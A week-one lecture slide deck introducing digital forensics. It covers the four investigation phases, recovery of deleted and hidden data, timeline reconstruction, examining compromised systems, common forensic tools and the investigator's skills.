Introduction to Digital Forensics

Week 1

What is Digital Forensics?

• Emerging discipline in computer security
• “voodoo science”
• No standards, few research
• Investigation that takes place after an incident has happened
• Try to answer questions: Who, what, when, where, why, and how

Types of investigations

• Determine what the incident was and get back to a working state
• Internal investigation
• Should be based on IR policy
• May lead to criminal investigation
• Criminal investigation
• Support for “real world” investigations

Typical investigation phases

1. Acquisition
2. Recovery
3. Analysis
4. Presentation

Phase 1: Acquisition

• Analogous to crime scene in the “real world”
• Goal is to recover as much evidence without altering the crime scene
• Investigator should document as much as possible
• Maintain Chain of Custody

Acquisition (2)

• Determine if incident actually happened
• What kind of system is to be investigated?
• Can it be shut down?
• Does it have to keep operating?
• Are there policies governing the handling of the incident?
• Is a warrant needed?

Acquisition (3)

• Get most fleeting information first
• Running processes
• Open sockets
• Memory
• Storage media
• Create 1:1 copies of evidence (imaging)
• If possible, lock up original system in the evidence locker

​

Phase 2: Recovery

• Goal is to extract data from the acquired evidence
• Always work on copies, never the original
• Must be able to repeat entire process from scratch
• Data, deleted data, “hidden” data

File systems

• Get files and directories
• Metadata
• User IDs
• Timestamps (MAC times)
• Permissions, …
• Some deleted files may be recovered
• Slack space

File deletion

• Most file systems only delete directory entries but not the data blocks associated with a file.
• Unless blocks get reallocated the file may be reconstructed
• The earlier the better the chances
• Depending on fragmentation, only partial reconstruction may be possible

​

Slack space

• Unallocated blocks
• Mark blocks as allocated to fool the file system
• Unused space at end of files if it doesn’t end on block boundaries
• Unused space in file system data structures

Steganography

• Data hidden in other data
• Unused or irrelevant locations are used to store information
• Most common in images, but may also be used on executable files, meta data, file system slack space

Encrypted data

• Depending on encryption method, it might be infeasible to get to the information.
• Locating the keys is often a better approach.
• A suspect may be compelled to reveal the keys by law.

Recovery (cont.)

• Locating hidden or encrypted data is difficult and might even be impossible.
• Investigator has to look at other clues:
• Steganography software
• Crypto software
• Command histories

File residue

• Even if a file is completely deleted from the disk, it might still have left a trace:
• Web cache
• Temporary directories
• Data blocks resulting from a move
• Memory

Phase 3: Analysis

• Methodology differs depending on the objectives of the investigation:
• Locate contraband material
• Reconstruct events that took place
• Determine if a system was compromised
• Authorship analysis

Contraband material

• Locate specific files
• Databases of illegal pictures
• Stolen property
• Determine if existing files are illegal
• Picture collections
• Music or movie downloads

Locating material

• Requires specific knowledge of file system and OS.
• Data may be encrypted, hidden, obfuscated
• Obfuscation:
• Misleading file suffix
• Misleading file name
• Unusual location

​

Event reconstruction

• Utilize system and external information
• Log files
• File timestamps
• Firewall/IDS information
• Establish time line of events

Time issues

• Granularity of time keeping
• Can’t order events that occur in the same time interval
• Multiple systems:
• Different clocks
• Clock drift
• E-mail headers and time zones

The needle in the haystack

• Locating files:
• Storage capacity approaches the terrabyte magnitude
• Potentially millions of files to investigate
• Event reconstruction:
• Dozens, hundreds of events a second
• Only last MAC times are available
• Insufficient logging

Compromised system

• If possible, compare against known good state
• Tripwire
• Databases of “good” files
• Look for unusual file MACs
• Look for open or listening network connections (trojans)
• Look for files in unusual locations

Unknown executables

• Run them in a constrained environment
• Dedicated system
• Sandbox
• Virtual machine
• Might be necessary to disassemble and decompile
• May take weeks or months

Authorship analysis

• Determine who or what kind of person created file.
• Programs (Viruses, Tojans, Sniffers/Loggers)
• E-mails (Blackmail, Harassment, Information leaks)
• If actual person cannot be determined, just determining the skill level of the author may be important.

Phase 4: Presentation

• An investigator that performed the analysis may have to appear in court as an expert witness.
• For internal investigations, a report or presentation may be required.
• Challenge: present the material in simple terms so that a jury or CEO can understand it.

Forensics Tools

• Acquisition
• dd, pdd
• SafeBack, …
• Recovery
• Encase
• TCT and SleuthKit
• Analysis
• ?
• Presentation
• ?

DF Investigator Profile

• Understanding of relevant laws
• Knowledge of file systems, OS, and applications
• Where are the logs, what is logged?
• What are possible obfuscation techniques?
• What programs and libraries are present on the system and how are they used?
• Know what tools exist and how to use them
• Be able to explain things in simple terms

​

Future in DF

• The need for standards
• Acquisition procedure: develop step-by-step instructions to be followed
• Certification
• Investigators
• Tools
• Operating Systems

Future in DF (2)

• Research
• Create more meaningful audit data
• Ensure integrity and availability of audit data
• Privacy and Digital Forensics
• Develop detection techniques
• Develop automation processes

Future in DF (3)

• Documentation
• File systems
• Over 50 different FS currently in use
• Most are poorly documented
• Malware
• “fingerprint” of bad programs
• Good system state
• Accessible databases
• Every OS, version, patchlevel

Thank You